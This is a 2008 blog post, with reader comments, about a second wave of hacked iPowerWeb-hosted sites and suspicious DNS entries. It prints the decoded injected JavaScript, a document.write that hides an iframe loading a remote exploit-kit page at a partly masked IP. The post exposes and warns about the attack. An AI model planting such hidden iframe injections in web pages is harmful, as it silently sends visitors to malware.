Sunday, July 06, 2008

iPowerWeb Hacking Continues

Over a year ago I wrote about a bunch of iPowerWeb's shared servers being hacked, and it looked like they were trying to clean it up, but now it's time for round two of hacking.

The latest batch of hacked sites may have a DNS hack as well, I'm not sure that's the case but Alex seems to think it is.

All these sites have the following Whois Name Server entries:

Sure looks like iPowerWeb, right?

But the reverse DNS all goes to IPs on * which links to BIZLAND

Here's a sample of the javascript in this round of site hacking:
Don't go to the link below if you know what's good for you, it's not safe.

The javascript above, when decoded, is the following:
window.status='Done';document.write('<iframe name=f2f8f656791 src=\'http:// 58.65.232.*/gpack/index.php?'+Math.round(Math.random()*74880)+'2\' width=480 height=156 style=\'display: none\'></iframe>')
You guessed it, bad things happen at which APNIC claims to be out of Honk Kong which has a San Francisco mailbox according to their website.

Can someone explain why this exploit site still exists if these guys are doing business with a US address and all hell isn't raining down on their parade?

I don't get it, the web has gone mad...


Anonymous said...

Few months ago, same problem on I contact the support bu they are to idiot to understand the problem so i change isp. After 3 weeks they has fixed all the infected pages and no one note about this!!

Sure 100% , is a crap isp.

Anonymous said...
" - mass spammer hosting

Just swarming with spammers, phishers and other cybercriminals."

kikkus: is not as bad as, but they work hard to get on blacklists, just like IP69, Shark Systems, First Colo and many other dark server providers do.

IncrediBILL said...

Too funny, I had to mess up the javascript example because Avast started screaming that my blog had a virus.

Didn't want people to think this site was infected to I threw a few spaces in the script to mess it up.

Anonymous said...

Somethings never really change, they just get upgraded. I can recall the many hacked site at geocities years ago. Someone and or group know which "hosts" are vulnerable and they just continue to return.

What's the latin version for "Buyer Beware?

Anonymous said...

Caveat emptor.